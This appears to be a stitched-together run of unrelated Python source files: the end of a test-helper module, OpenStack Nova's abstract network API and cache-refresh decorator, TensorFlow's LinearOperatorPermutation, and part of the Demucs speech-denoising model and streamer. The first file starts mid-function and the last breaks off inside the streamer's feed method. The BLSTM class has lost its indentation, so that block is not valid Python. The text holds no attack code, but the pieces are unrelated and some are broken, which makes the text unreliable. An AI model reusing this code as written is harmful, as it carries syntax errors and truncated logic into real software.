        print('    value in {d2}'.format(d2=d2_label))
        print()
        for key in differ.changed():
            print(' ', key + ':')
            print('   ', d1[key])
            print('   ', d2[key])
            print()
        print()
    if print_unchanged:
        print('Unchanged :: keys which are the same in {d1} and {d2} and whose values are also the same'.format(d1=d1_label, d2=d2_label))
        print(differ.unchanged())
def load_from_matrix(filename, test_ids):
    """Load parameterised test cases from a CSV matrix file.

    Reads ``matrices/<filename>`` relative to this file, skipping the
    header row. When ``test_ids`` is empty or None every row is kept,
    otherwise only rows whose first column is in ``test_ids``. The
    first column of each kept row is prefixed with "row_id_" and the
    rows are returned as a list of tuples.
    """
    if test_ids is None:
        test_ids = []
    cases = []
    with open(paths.rel2abs(__file__, "matrices", filename), 'r') as f:
        reader = csv.reader(f)
        next(reader)  # pop the header row
        for row in reader:
            if len(test_ids) == 0 or row[0] in test_ids:
                cases.append(tuple(["row_id_" + row[0]] + row[1:]))
    return cases
def deep_sort(obj):
    """
    Recursively sort list or dict nested lists.

    Dicts are rebuilt with their keys in sorted order (values sorted
    recursively); lists are sorted after their elements have been
    recursively sorted; any other value is returned unchanged.
    """
    if isinstance(obj, dict):
        return {key: deep_sort(obj[key]) for key in sorted(obj)}
    if isinstance(obj, list):
        return sorted(deep_sort(item) for item in obj)
    return obj
| |
# Copyright 2014 OpenStack Foundation
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import inspect
from oslo_concurrency import lockutils
from oslo_log import log as logging
from oslo_utils import excutils
from nova.db import base
from nova import hooks
from nova.i18n import _, _LE
from nova.network import model as network_model
from nova import objects
LOG = logging.getLogger(__name__)
@hooks.add_hook('instance_network_info')
def update_instance_cache_with_nw_info(impl, context, instance,
                                       nw_info=None, update_cells=True):
    """Store network info in the instance's info cache.

    :param impl: network API implementation; must provide
        ``_get_instance_nw_info``, used when ``nw_info`` is absent or
        not a valid NetworkInfo object.
    :param context: the request context.
    :param instance: the instance whose cache is updated (``uuid``
        attribute is used as the cache key).
    :param nw_info: a ``network_model.NetworkInfo`` to store; any other
        value is discarded and the info is fetched fresh instead.
    :param update_cells: passed through to InstanceInfoCache.save().
    """
    try:
        # Anything that is not a NetworkInfo (including None) forces a
        # fresh fetch from the network implementation.
        if not isinstance(nw_info, network_model.NetworkInfo):
            nw_info = None
        if nw_info is None:
            nw_info = impl._get_instance_nw_info(context, instance)
        LOG.debug('Updating cache with info: %s', nw_info)
        # NOTE(comstud): The save() method actually handles updating or
        # creating the instance. We don't need to retrieve the object
        # from the DB first.
        ic = objects.InstanceInfoCache.new(context, instance.uuid)
        ic.network_info = nw_info
        ic.save(update_cells=update_cells)
    except Exception:
        # Log the failure, then re-raise to the caller.
        with excutils.save_and_reraise_exception():
            LOG.exception(_LE('Failed storing info cache'), instance=instance)
def refresh_cache(f):
    """Decorator to update the instance_info_cache

    Requires context and instance as function args
    """
    # NOTE(review): inspect.getargspec is deprecated on Python 3 —
    # confirm before porting. It is used only to locate the position
    # of the 'instance' parameter in the decorated signature.
    argspec = inspect.getargspec(f)

    @functools.wraps(f)
    def wrapper(self, context, *args, **kwargs):
        res = f(self, context, *args, **kwargs)
        try:
            # get the instance from arguments (or raise ValueError)
            instance = kwargs.get('instance')
            if not instance:
                # -2 compensates for 'self' and 'context', which are
                # consumed explicitly and therefore not in *args.
                instance = args[argspec.args.index('instance') - 2]
        except ValueError:
            msg = _('instance is a required argument to use @refresh_cache')
            raise Exception(msg)

        # Serialize cache refreshes per instance uuid.
        with lockutils.lock('refresh_cache-%s' % instance.uuid):
            update_instance_cache_with_nw_info(self, context, instance,
                                               nw_info=res)
        # return the original function's return value
        return res
    return wrapper
# Sentinel used by associate() so callers can distinguish "argument not
# supplied" from an explicitly passed value (including None).
SENTINEL = object()


class NetworkAPI(base.Base):
    """Base Network API for doing networking operations.

    New operations available on specific clients must be added here as well.
    """
    def __init__(self, skip_policy_check=False, **kwargs):
        # skip_policy_check: stored for subclasses; remaining kwargs are
        # forwarded to base.Base.
        self.skip_policy_check = skip_policy_check
        super(NetworkAPI, self).__init__(**kwargs)

    def get_all(self, context):
        """Get all the networks for client."""
        raise NotImplementedError()

    def get(self, context, network_uuid):
        """Get specific network for client."""
        raise NotImplementedError()

    def create(self, context, **kwargs):
        """Create a network."""
        raise NotImplementedError()

    def delete(self, context, network_uuid):
        """Delete a specific network."""
        raise NotImplementedError()

    def disassociate(self, context, network_uuid):
        """Disassociate a network for client."""
        raise NotImplementedError()

    def get_fixed_ip(self, context, id):
        """Get fixed ip by id."""
        raise NotImplementedError()

    def get_fixed_ip_by_address(self, context, address):
        """Get fixed ip by address."""
        raise NotImplementedError()

    def get_floating_ip(self, context, id):
        """Get floating ip by id."""
        raise NotImplementedError()

    def get_floating_ip_pools(self, context):
        """Get floating ip pools."""
        raise NotImplementedError()

    def get_floating_ip_by_address(self, context, address):
        """Get floating ip by address."""
        raise NotImplementedError()

    def get_floating_ips_by_project(self, context):
        """Get floating ips by project."""
        raise NotImplementedError()

    def get_instance_id_by_floating_address(self, context, address):
        """Get instance id by floating address."""
        raise NotImplementedError()

    def get_vifs_by_instance(self, context, instance):
        """Get vifs by instance."""
        raise NotImplementedError()

    def get_vif_by_mac_address(self, context, mac_address):
        """Get vif mac address."""
        raise NotImplementedError()

    def allocate_floating_ip(self, context, pool=None):
        """Adds (allocate) floating ip to a project from a pool."""
        raise NotImplementedError()

    def release_floating_ip(self, context, address,
                            affect_auto_assigned=False):
        """Removes (deallocates) a floating ip with address from a project."""
        raise NotImplementedError()

    def disassociate_and_release_floating_ip(self, context, instance,
                                             floating_ip):
        """Removes (deallocates) and deletes the floating ip."""
        raise NotImplementedError()

    def associate_floating_ip(self, context, instance,
                              floating_address, fixed_address,
                              affect_auto_assigned=False):
        """Associates a floating ip with a fixed ip."""
        raise NotImplementedError()

    def disassociate_floating_ip(self, context, instance, address,
                                 affect_auto_assigned=False):
        """Disassociates a floating ip from fixed ip it is associated with."""
        raise NotImplementedError()

    def allocate_for_instance(self, context, instance, vpn,
                              requested_networks, macs=None,
                              security_groups=None,
                              dhcp_options=None):
        """Allocates all network structures for an instance.

        :param context: The request context.
        :param instance: nova.objects.instance.Instance object.
        :param vpn: A boolean, if True, indicate a vpn to access the instance.
        :param requested_networks: A dictionary of requested_networks,
            Optional value containing network_id, fixed_ip, and port_id.
        :param macs: None or a set of MAC addresses that the instance
            should use. macs is supplied by the hypervisor driver (contrast
            with requested_networks which is user supplied).
        :param security_groups: None or security groups to allocate for
            instance.
        :param dhcp_options: None or a set of key/value pairs that should
            determine the DHCP BOOTP response, eg. for PXE booting an instance
            configured with the baremetal hypervisor. It is expected that these
            are already formatted for the neutron v2 api.
            See nova/virt/driver.py:dhcp_options_for_instance for an example.
        :returns: network info as from get_instance_nw_info() below
        """
        raise NotImplementedError()

    def deallocate_for_instance(self, context, instance,
                                requested_networks=None):
        """Deallocates all network structures related to instance."""
        raise NotImplementedError()

    def allocate_port_for_instance(self, context, instance, port_id,
                                   network_id=None, requested_ip=None):
        """Allocate port for instance."""
        raise NotImplementedError()

    def deallocate_port_for_instance(self, context, instance, port_id):
        """Deallocate port for instance."""
        raise NotImplementedError()

    def list_ports(self, *args, **kwargs):
        """List ports."""
        raise NotImplementedError()

    def show_port(self, *args, **kwargs):
        """Show specific port."""
        raise NotImplementedError()

    def add_fixed_ip_to_instance(self, context, instance, network_id):
        """Adds a fixed ip to instance from specified network."""
        raise NotImplementedError()

    def remove_fixed_ip_from_instance(self, context, instance, address):
        """Removes a fixed ip from instance from specified network."""
        raise NotImplementedError()

    def add_network_to_project(self, context, project_id, network_uuid=None):
        """Force adds another network to a project."""
        raise NotImplementedError()

    def associate(self, context, network_uuid, host=SENTINEL,
                  project=SENTINEL):
        """Associate or disassociate host or project to network.

        ``host`` and ``project`` default to SENTINEL so implementations
        can tell "not supplied" apart from an explicit value.
        """
        raise NotImplementedError()

    def get_instance_nw_info(self, context, instance, **kwargs):
        """Returns all network info related to an instance."""
        raise NotImplementedError()

    def create_pci_requests_for_sriov_ports(self, context,
                                            pci_requests,
                                            requested_networks):
        """Check requested networks for any SR-IOV port request.

        Create a PCI request object for each SR-IOV port, and add it to the
        pci_requests object that contains a list of PCI request object.
        """
        raise NotImplementedError()

    def validate_networks(self, context, requested_networks, num_instances):
        """validate the networks passed at the time of creating
        the server.

        Return the number of instances that can be successfully allocated
        with the requested network configuration.
        """
        raise NotImplementedError()

    def get_dns_domains(self, context):
        """Returns a list of available dns domains.

        These can be used to create DNS entries for floating ips.
        """
        raise NotImplementedError()

    def add_dns_entry(self, context, address, name, dns_type, domain):
        """Create specified DNS entry for address."""
        raise NotImplementedError()

    def modify_dns_entry(self, context, name, address, domain):
        """Create specified DNS entry for address."""
        raise NotImplementedError()

    def delete_dns_entry(self, context, name, domain):
        """Delete the specified dns entry."""
        raise NotImplementedError()

    def delete_dns_domain(self, context, domain):
        """Delete the specified dns domain."""
        raise NotImplementedError()

    def get_dns_entries_by_address(self, context, address, domain):
        """Get entries for address and domain."""
        raise NotImplementedError()

    def get_dns_entries_by_name(self, context, name, domain):
        """Get entries for name and domain."""
        raise NotImplementedError()

    def create_private_dns_domain(self, context, domain, availability_zone):
        """Create a private DNS domain with nova availability zone."""
        raise NotImplementedError()

    def create_public_dns_domain(self, context, domain, project=None):
        """Create a public DNS domain with optional nova project."""
        raise NotImplementedError()

    def setup_networks_on_host(self, context, instance, host=None,
                               teardown=False):
        """Setup or teardown the network structures on hosts related to
        instance.
        """
        raise NotImplementedError()

    def migrate_instance_start(self, context, instance, migration):
        """Start to migrate the network of an instance."""
        raise NotImplementedError()

    def migrate_instance_finish(self, context, instance, migration):
        """Finish migrating the network of an instance."""
        raise NotImplementedError()

    def setup_instance_network_on_host(self, context, instance, host):
        """Setup network for specified instance on host.

        :param context: The request context.
        :param instance: nova.objects.instance.Instance object.
        :param host: The host which network should be setup for instance.
        """
        raise NotImplementedError()

    def cleanup_instance_network_on_host(self, context, instance, host):
        """Cleanup network for specified instance on host.

        :param context: The request context.
        :param instance: nova.objects.instance.Instance object.
        :param host: The host which network should be cleanup for instance.
        """
        raise NotImplementedError()
| |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""`LinearOperator` acting like a permutation matrix."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import sort_ops
from tensorflow.python.ops.linalg import linalg_impl as linalg
from tensorflow.python.ops.linalg import linear_operator
from tensorflow.python.ops.linalg import linear_operator_util
from tensorflow.python.util.tf_export import tf_export
__all__ = ["LinearOperatorPermutation",]
@tf_export("linalg.LinearOperatorPermutation")
@linear_operator.make_composite_tensor
class LinearOperatorPermutation(linear_operator.LinearOperator):
  """`LinearOperator` acting like a [batch] of permutation matrices.

  This operator acts like a [batch] of permutations with shape
  `[B1,...,Bb, N, N]` for some `b >= 0`. The first `b` indices index a
  batch member. For every batch index `(i1,...,ib)`, `A[i1,...,ib, : :]` is
  an `N x N` matrix. This matrix `A` is not materialized, but for
  purposes of broadcasting this shape will be relevant.

  `LinearOperatorPermutation` is initialized with a (batch) vector.

  A permutation is defined by an integer vector `v` whose values are unique
  and are in the range `[0, ..., N - 1]`. Applying the permutation on an
  input matrix has the following meaning: the value of `v` at index `i`
  says to move the `v[i]`-th row of the input matrix to the `i`-th row.
  Because all values are unique, this will result in a permutation of the
  rows of the input matrix. Note, that the permutation vector `v` has the
  same semantics as `tf.transpose`.

  ```python
  # Create a 3 x 3 permutation matrix that swaps the last two columns.
  vec = [0, 2, 1]
  operator = LinearOperatorPermutation(vec)

  operator.to_dense()
  ==> [[1., 0., 0.]
       [0., 0., 1.]
       [0., 1., 0.]]

  operator.shape
  ==> [3, 3]

  # This will be zero.
  operator.log_abs_determinant()
  ==> scalar Tensor

  x = ... Shape [3, 4] Tensor
  operator.matmul(x)
  ==> Shape [3, 4] Tensor
  ```

  #### Shape compatibility

  This operator acts on [batch] matrix with compatible shape.
  `x` is a batch matrix with compatible shape for `matmul` and `solve` if

  ```
  operator.shape = [B1,...,Bb] + [N, N], with b >= 0
  x.shape = [C1,...,Cc] + [N, R],
  and [C1,...,Cc] broadcasts with [B1,...,Bb] to [D1,...,Dd]
  ```

  #### Matrix property hints

  This `LinearOperator` is initialized with boolean flags of the form `is_X`,
  for `X = non_singular, self_adjoint, positive_definite, square`.
  These have the following meaning:

  * If `is_X == True`, callers should expect the operator to have the
    property `X`. This is a promise that should be fulfilled, but is *not* a
    runtime assert. For example, finite floating point precision may result
    in these promises being violated.
  * If `is_X == False`, callers should expect the operator to not have `X`.
  * If `is_X == None` (the default), callers should have no expectation either
    way.
  """

  def __init__(self,
               perm,
               dtype=dtypes.float32,
               is_non_singular=None,
               is_self_adjoint=None,
               is_positive_definite=None,
               is_square=None,
               name="LinearOperatorPermutation"):
    r"""Initialize a `LinearOperatorPermutation`.

    Args:
      perm: Shape `[B1,...,Bb, N]` Integer `Tensor` with `b >= 0`
        `N >= 0`. An integer vector that represents the permutation to apply.
        Note that this argument is same as `tf.transpose`. However, this
        permutation is applied on the rows, while the permutation in
        `tf.transpose` is applied on the dimensions of the `Tensor`. `perm`
        is required to have unique entries from `{0, 1, ... N-1}`.
      dtype: The `dtype` of arguments to this operator. Default: `float32`.
        Allowed dtypes: `float16`, `float32`, `float64`, `complex64`,
        `complex128`.
      is_non_singular: Expect that this operator is non-singular. A
        permutation operator is always non-singular, so passing `False`
        raises.
      is_self_adjoint: Expect that this operator is equal to its hermitian
        transpose.
      is_positive_definite: Expect that this operator is positive definite,
        meaning the quadratic form `x^H A x` has positive real part for all
        nonzero `x`. Note that we do not require the operator to be
        self-adjoint to be positive-definite. See:
        https://en.wikipedia.org/wiki/Positive-definite_matrix#Extension_for_non-symmetric_matrices
      is_square: Expect that this operator acts like square [batch] matrices.
        This is auto-set to `True`; passing `False` raises.
      name: A name for this `LinearOperator`.

    Raises:
      ValueError: if `is_non_singular` is `False` or `is_square` is `False`.
    """
    parameters = dict(
        perm=perm,
        dtype=dtype,
        is_non_singular=is_non_singular,
        is_self_adjoint=is_self_adjoint,
        is_positive_definite=is_positive_definite,
        is_square=is_square,
        name=name
    )

    with ops.name_scope(name, values=[perm]):
      self._perm = linear_operator_util.convert_nonref_to_tensor(
          perm, name="perm")
      self._check_perm(self._perm)

      # Check and auto-set hints.
      if is_non_singular is False:  # pylint:disable=g-bool-id-comparison
        raise ValueError("A Permutation operator is always non-singular.")

      if is_square is False:  # pylint:disable=g-bool-id-comparison
        raise ValueError("A Permutation operator is always square.")
      is_square = True

      super(LinearOperatorPermutation, self).__init__(
          dtype=dtype,
          is_non_singular=is_non_singular,
          is_self_adjoint=is_self_adjoint,
          is_positive_definite=is_positive_definite,
          is_square=is_square,
          parameters=parameters,
          name=name)

  def _check_perm(self, perm):
    """Static check of perm.

    Validates rank and dtype, and — when the value is statically known —
    that the entries are exactly a permutation of `0..N-1`.
    """
    if (perm.shape.ndims is not None and perm.shape.ndims < 1):
      raise ValueError(
          "Argument perm must have at least 1 dimension. "
          "Found: %s" % perm)
    if not perm.dtype.is_integer:
      raise TypeError("Argument perm must be integer dtype. Found:"
                      " %s" % perm)
    # Check that the permutation satisfies the uniqueness constraint.
    static_perm = tensor_util.constant_value(perm)
    if static_perm is not None:
      sorted_perm = np.sort(static_perm, axis=-1)
      if np.any(sorted_perm != np.arange(0, static_perm.shape[-1])):
        raise ValueError(
            "Argument perm must be a vector of unique integers from"
            " 0 to {}.".format(static_perm.shape[-1] - 1))

  def _shape(self):
    # Static shape: perm is [B1,...,Bb, N], so the operator is
    # [B1,...,Bb, N, N].
    perm_shape = self._perm.shape
    return perm_shape.concatenate(perm_shape[-1:])

  def _shape_tensor(self):
    # Dynamic analogue of `_shape`: append N once more to perm's shape.
    perm_shape = array_ops.shape(self._perm)
    k = perm_shape[-1]
    return array_ops.concat((perm_shape, [k]), 0)

  def _assert_non_singular(self):
    # Permutation matrices are always invertible, so there is nothing
    # to check at runtime.
    return control_flow_ops.no_op("assert_non_singular")

  def _domain_dimension_tensor(self, perm=None):
    # N, the size of the (square) operator, read off the last axis of perm.
    perm = perm if perm is not None else self.perm
    return array_ops.shape(perm)[-1]

  def _matmul(self, x, adjoint=False, adjoint_arg=False):
    perm = ops.convert_to_tensor_v2_with_dispatch(self.perm)
    if adjoint and not self.is_self_adjoint:
      # TODO(srvasude): invert_permutation doesn't work on batches so we use
      # argsort.
      perm = sort_ops.argsort(perm, axis=-1)
    x = linalg.adjoint(x) if adjoint_arg else x

    # We need to broadcast x and the permutation since tf.gather doesn't
    # broadcast.
    broadcast_shape = array_ops.broadcast_dynamic_shape(
        array_ops.shape(x)[:-1], array_ops.shape(perm))
    k = array_ops.shape(x)[-1]
    broadcast_x_shape = array_ops.concat([broadcast_shape, [k]], axis=-1)
    x = array_ops.broadcast_to(x, broadcast_x_shape)
    perm = array_ops.broadcast_to(perm, broadcast_shape)

    # Flatten batch dims so a single batched gather permutes the rows,
    # then restore the broadcasted shape.
    m = array_ops.shape(x)[-2]
    x = array_ops.reshape(x, [-1, m, k])
    perm = array_ops.reshape(perm, [-1, m])

    y = array_ops.gather(x, perm, axis=-2, batch_dims=1)
    return array_ops.reshape(y, broadcast_x_shape)

  # TODO(srvasude): Permutation parity is equivalent to the determinant.

  def _log_abs_determinant(self):
    # Permutation matrices have determinant +/- 1.
    return array_ops.zeros(shape=self.batch_shape_tensor(), dtype=self.dtype)

  def _solve(self, rhs, adjoint=False, adjoint_arg=False):
    # The inverse of a permutation matrix is the transpose matrix.
    # Apply a matmul and flip the adjoint bit.
    return self._matmul(rhs, adjoint=(not adjoint), adjoint_arg=adjoint_arg)

  def _to_dense(self):
    # Dense matrix with a one at (i, perm[i]) in every row, built by
    # comparing a range against the (batched) permutation vector.
    perm = ops.convert_to_tensor_v2_with_dispatch(self.perm)
    return math_ops.cast(math_ops.equal(
        math_ops.range(0, self._domain_dimension_tensor(perm)),
        perm[..., array_ops.newaxis]), self.dtype)

  def _diag_part(self):
    # Diagonal entry i is 1 exactly when perm[i] == i (a fixed point).
    perm = ops.convert_to_tensor_v2_with_dispatch(self.perm)
    return math_ops.cast(math_ops.equal(
        math_ops.range(0, self._domain_dimension_tensor(perm)),
        perm), self.dtype)

  def _cond(self):
    # Permutation matrices are rotations which have condition number 1.
    return array_ops.ones(self.batch_shape_tensor(), dtype=self.dtype)

  @property
  def perm(self):
    # The (batch) permutation vector this operator was built from.
    return self._perm

  @property
  def _composite_tensor_fields(self):
    # Fields used to rebuild this operator as a composite tensor.
    return ("perm", "dtype")
| |
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
# author: adefossez
import math
import time
import torch as th
from torch import nn
from torch.nn import functional as F
from .resample import downsample2, upsample2
from .utils import capture_init
class BLSTM(nn.Module):
def __init__(self, dim, layers=2, bi=True):
super().__init__()
klass = nn.LSTM
self.lstm = klass(
bidirectional=bi, num_layers=layers, hidden_size=dim, input_size=dim
)
self.linear = None
if bi:
self.linear = nn.Linear(2 * dim, dim)
def forward(self, x, hidden=None):
x, hidden = self.lstm(x, hidden)
if self.linear:
x = self.linear(x)
return x, hidden
def rescale_conv(conv, reference):
    """Rescale `conv`'s parameters in place toward a reference spread.

    Weight (and bias, when present) are divided by
    `sqrt(weight_std / reference)`, a soft renormalization of the layer
    toward the reference standard deviation
    (see https://arxiv.org/abs/1911.13254).
    """
    weight_std = conv.weight.std().detach()
    factor = (weight_std / reference) ** 0.5
    conv.weight.data.div_(factor)
    if conv.bias is not None:
        conv.bias.data.div_(factor)
def rescale_module(module, reference):
    """Apply `rescale_conv` to every 1d (transposed) conv inside `module`."""
    for layer in module.modules():
        if isinstance(layer, (nn.Conv1d, nn.ConvTranspose1d)):
            rescale_conv(layer, reference)
class Demucs(nn.Module):
    """
    Demucs speech enhancement model.
    Args:
        - chin (int): number of input channels.
        - chout (int): number of output channels.
        - hidden (int): number of initial hidden channels.
        - depth (int): number of layers.
        - kernel_size (int): kernel size for each layer.
        - stride (int): stride for each layer.
        - causal (bool): if false, uses BiLSTM instead of LSTM.
        - resample (int): amount of resampling to apply to the input/output.
            Can be one of 1, 2 or 4.
        - growth (float): number of channels is multiplied by this for every layer.
        - max_hidden (int): maximum number of channels. Can be useful to
            control the size/speed of the model.
        - normalize (bool): if true, normalize the input.
        - glu (bool): if true uses GLU instead of ReLU in 1x1 convolutions.
        - rescale (float): controls custom weight initialization.
            See https://arxiv.org/abs/1911.13254.
        - floor (float): stability flooring when normalizing.
    """
    @capture_init
    def __init__(self,
                 chin=1,
                 chout=1,
                 hidden=48,
                 depth=5,
                 kernel_size=8,
                 stride=4,
                 causal=True,
                 resample=4,
                 growth=2,
                 max_hidden=10_000,
                 normalize=True,
                 glu=True,
                 rescale=0.1,
                 floor=1e-3):
        super().__init__()
        if resample not in [1, 2, 4]:
            raise ValueError("Resample should be 1, 2 or 4.")
        self.chin = chin
        self.chout = chout
        self.hidden = hidden
        self.depth = depth
        self.kernel_size = kernel_size
        self.stride = stride
        self.causal = causal
        self.floor = floor
        self.resample = resample
        self.normalize = normalize
        self.encoder = nn.ModuleList()
        self.decoder = nn.ModuleList()
        # GLU halves its input channels, so the 1x1 convs must produce
        # twice as many channels when GLU is used.
        activation = nn.GLU(1) if glu else nn.ReLU()
        ch_scale = 2 if glu else 1

        # Build mirrored encoder/decoder stacks. Channel width is
        # multiplied by `growth` per layer, capped at `max_hidden`.
        # Decoders are inserted at position 0 so decoder[0] mirrors the
        # deepest encoder layer.
        for index in range(depth):
            encode = []
            encode += [
                nn.Conv1d(chin, hidden, kernel_size, stride),
                nn.ReLU(),
                nn.Conv1d(hidden, hidden * ch_scale, 1), activation,
            ]
            self.encoder.append(nn.Sequential(*encode))

            decode = []
            decode += [
                nn.Conv1d(hidden, ch_scale * hidden, 1), activation,
                nn.ConvTranspose1d(hidden, chout, kernel_size, stride),
            ]
            # The outermost decoder (index 0) produces the waveform and
            # therefore gets no trailing ReLU.
            if index > 0:
                decode.append(nn.ReLU())
            self.decoder.insert(0, nn.Sequential(*decode))
            chout = hidden
            chin = hidden
            hidden = min(int(growth * hidden), max_hidden)

        # Bottleneck sequence model; bidirectional only when non-causal.
        self.lstm = BLSTM(chin, bi=not causal)
        if rescale:
            rescale_module(self, reference=rescale)

    def valid_length(self, length):
        """
        Return the nearest valid length to use with the model so that
        there is no time steps left over in a convolutions, e.g. for all
        layers, size of the input - kernel_size % stride = 0.

        If the mixture has a valid length, the estimated sources
        will have exactly the same length.
        """
        # Walk the strided convs forward, then invert the arithmetic to
        # recover the smallest input length >= `length` that divides evenly.
        length = math.ceil(length * self.resample)
        for _ in range(self.depth):
            length = math.ceil((length - self.kernel_size) / self.stride) + 1
            length = max(length, 1)
        for _ in range(self.depth):
            length = (length - 1) * self.stride + self.kernel_size
        length = int(math.ceil(length / self.resample))
        return int(length)

    @property
    def total_stride(self):
        # Overall hop size of the whole encoder, expressed in input samples
        # (the internal resampling divides the effective stride).
        return self.stride ** self.depth // self.resample

    def forward(self, mix):
        # Accept 2-d input by adding a singleton channel dimension.
        if mix.dim() == 2:
            mix = mix.unsqueeze(1)

        if self.normalize:
            # Normalize by the std of the mono mixdown; `floor` avoids
            # division by ~0 on silent input. Undone at the end.
            mono = mix.mean(dim=1, keepdim=True)
            std = mono.std(dim=-1, keepdim=True)
            mix = mix / (self.floor + std)
        else:
            std = 1
        length = mix.shape[-1]
        x = mix
        # Zero-pad so every strided conv divides the signal evenly.
        x = F.pad(x, (0, self.valid_length(length) - length))
        if self.resample == 2:
            x = upsample2(x)
        elif self.resample == 4:
            x = upsample2(x)
            x = upsample2(x)
        # U-Net: encoder activations are stacked and consumed in reverse
        # by the decoder as skip connections.
        skips = []
        for encode in self.encoder:
            x = encode(x)
            skips.append(x)
        # LSTM expects (time, batch, channels).
        x = x.permute(2, 0, 1)
        x, _ = self.lstm(x)
        x = x.permute(1, 2, 0)
        for decode in self.decoder:
            skip = skips.pop(-1)
            # Skip may be slightly longer due to padding; trim to match.
            x = x + skip[..., :x.shape[-1]]
            x = decode(x)
        if self.resample == 2:
            x = downsample2(x)
        elif self.resample == 4:
            x = downsample2(x)
            x = downsample2(x)

        # Trim the padding and undo the input normalization.
        x = x[..., :length]
        return std * x
def fast_conv(conv, x):
    """Evaluate `conv` on `x`, collapsing to a single matmul when possible.

    Two special cases reduce the convolution to one `th.addmm`:
    a 1x1 kernel (pure channel mixing), and an input whose length equals
    the kernel size (a single output time step). Anything else falls back
    to the regular convolution. Assumes batch size 1 and a conv with bias.
    """
    batch, chin, length = x.shape
    chout, chin, kernel = conv.weight.shape
    assert batch == 1
    if kernel == 1:
        # 1x1 conv is a matrix product over the channel dimension.
        flat = x.view(chin, length)
        out = th.addmm(
            conv.bias.view(-1, 1), conv.weight.view(chout, chin), flat
        )
    elif length == kernel:
        # One output position: flatten the whole receptive field.
        col = x.view(chin * kernel, 1)
        out = th.addmm(
            conv.bias.view(-1, 1), conv.weight.view(chout, chin * kernel), col
        )
    else:
        out = conv(x)
    return out.view(batch, chout, -1)
class DemucsStreamer:
    """
    Streaming implementation for Demucs. It supports being fed with any amount
    of audio at a time. You will get back as much audio as possible at that
    point.

    Args:
        - demucs (Demucs): Demucs model.
        - dry (float): amount of dry (e.g. input) signal to keep. 0 is maximum
            noise removal, 1 just returns the input signal. Small values > 0
            allows to limit distortions.
        - num_frames (int): number of frames to process at once. Higher values
            will increase overall latency but improve the real time factor.
        - resample_lookahead (int): extra lookahead used for the resampling.
        - resample_buffer (int): size of the buffer of previous inputs/outputs
            kept for resampling.
    """
    def __init__(self, demucs,
                 dry=0,
                 num_frames=1,
                 resample_lookahead=64,
                 resample_buffer=256):
        device = next(iter(demucs.parameters())).device
        self.demucs = demucs
        # Carried LSTM and per-layer convolution state between feed() calls.
        self.lstm_state = None
        self.conv_state = None
        self.dry = dry
        self.resample_lookahead = resample_lookahead
        resample_buffer = min(demucs.total_stride, resample_buffer)
        self.resample_buffer = resample_buffer
        # Samples consumed per frame; total_length additionally includes
        # the resampling lookahead.
        self.frame_length = demucs.valid_length(1) + \
            demucs.total_stride * (num_frames - 1)
        self.total_length = self.frame_length + self.resample_lookahead
        self.stride = demucs.total_stride * num_frames
        # Context buffers so the up/down-sampling filters see continuous
        # audio across frame boundaries.
        self.resample_in = th.zeros(demucs.chin, resample_buffer, device=device)
        self.resample_out = th.zeros(
            demucs.chin, resample_buffer, device=device
        )
        self.frames = 0
        self.total_time = 0
        # Running estimate of input variance (used when demucs.normalize).
        self.variance = 0
        # Audio received but not yet long enough to process.
        self.pending = th.zeros(demucs.chin, 0, device=device)

        bias = demucs.decoder[0][2].bias
        weight = demucs.decoder[0][2].weight
        chin, chout, kernel = weight.shape
        # Rearranged copies of the final transposed-conv parameters;
        # presumably for a faster matmul-based evaluation — not used by
        # any method visible here, TODO confirm.
        self._bias = bias.view(-1, 1).repeat(1, kernel).view(-1, 1)
        self._weight = weight.permute(1, 2, 0).contiguous()

    def reset_time_per_frame(self):
        # Reset the timing accumulators used by `time_per_frame`.
        self.total_time = 0
        self.frames = 0

    @property
    def time_per_frame(self):
        # Average wall-clock seconds spent per processed frame.
        return self.total_time / self.frames

    def flush(self):
        """
        Flush remaining audio by padding it with zero. Call this
        when you have no more input and want to get back the last chunk of audio.
        """
        pending_length = self.pending.shape[1]
        padding = th.zeros(
            self.demucs.chin, self.total_length, device=self.pending.device
        )
        out = self.feed(padding)
        # Only the part corresponding to real pending audio is returned.
        return out[:, :pending_length]

    def feed(self, wav):
        """
        Apply the model to mix using true real time evaluation.
        Normalization is done online as is the resampling.
        """
        begin = time.time()
        demucs = self.demucs
        resample_buffer = self.resample_buffer
        stride = self.stride
        resample = demucs.resample

        if wav.dim() != 2:
            raise ValueError("input wav should be two dimensional.")
        chin, _ = wav.shape
        if chin != demucs.chin:
            raise ValueError(f"Expected {demucs.chin} channels, got {chin}")

        self.pending = th.cat([self.pending, wav], dim=1)
        outs = []
        # Process as many full frames as the buffered audio allows.
        while self.pending.shape[1] >= self.total_length:
            self.frames += 1
            frame = self.pending[:, :self.total_length]
            dry_signal = frame[:, :stride]
            if demucs.normalize:
                # Online (exponential-style) update of the input variance.
                mono = frame.mean(0)
                variance = (mono**2).mean()
                self.variance = variance / self.frames + \
                    (1 - 1 / self.frames) * self.variance
                frame = frame / (demucs.floor + math.sqrt(self.variance))
            # Prepend the saved context so resampling is seamless.
            frame = th.cat([self.resample_in, frame], dim=-1)
            self.resample_in[:] = frame[:, stride - resample_buffer:stride]

            if resample == 4:
                frame = upsample2(upsample2(frame))
            elif resample == 2:
                frame = upsample2(frame)
            # remove pre sampling buffer
            frame = frame[:, resample * resample_buffer:]
